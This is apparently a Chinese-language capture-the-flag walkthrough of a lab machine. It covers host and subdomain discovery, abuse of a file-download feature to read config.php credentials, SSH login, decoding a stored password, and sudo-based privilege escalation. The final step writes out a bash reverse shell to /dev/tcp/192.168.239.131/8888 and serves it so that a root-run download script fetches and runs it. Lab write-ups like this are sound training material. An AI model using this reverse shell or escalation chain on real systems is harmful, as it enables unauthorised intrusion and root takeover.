1.信息收集
探测存活主机,输入:netdiscover -r 192.168.239.0/24 ,发现192.168.239.177存活。

对目标主机192.168.239.176进行端口扫描,发现存活22(SSH)、80端口。

在浏览器上输入:http://192.168.239.177,查看源码,发现类似于网站的域名。


在/etc/hosts文件里面添加ip与对应的域名,浏览器访问域名,访问成果。


进行目录扫描,未发现可疑信息。

进行域名扫描,发现welcome.bassam.ctf,加入/etc/hosts中,访问http://welcome.bassam.ctf。

对http://welcome.bassam.ctf进行目录扫描,发现index.php与config.php。

访问index.php发现存在下载的功能。

2.漏洞利用
在url中输入:http://welcome.bassam.ctf/config.php,无反应;输入config.php下载成功,发现用户test:test123。

尝试ssh登录成功。
3.提权
在/home/kira中发现可执行文件test.sh,使用cat查看内容。

查看根目录,发现存在/PassProgram/文件夹,进入文件夹中,发现存在解码和编码。

查看/var/www/ctf,存在MySecretPassword可疑文件。

查看MySecretPassword文件类型为text,但无法查看。使用hexdump查看文件。猜测是用/PassProgram目录下的encoder加密的。

使用decoder解密,可得kira用户的密码为:kira2003。切换到kira用户。

输入sudo -l发现存在sudo提权。

切换到bassam用户。

查看bassam目录下存在down.sh文件,查看内容为下载script.sh文件。

将mywebsite.test域名添加到本机的hosts文件中

创建script.sh文件,在里面输入bash -i >& /dev/tcp/192.168.239.131/8888 0>&1,使用PHP开启web服务php -S 0:80。

开启本地监听,在另一个shell中输入sudo ./down.sh,反弹shell成功。











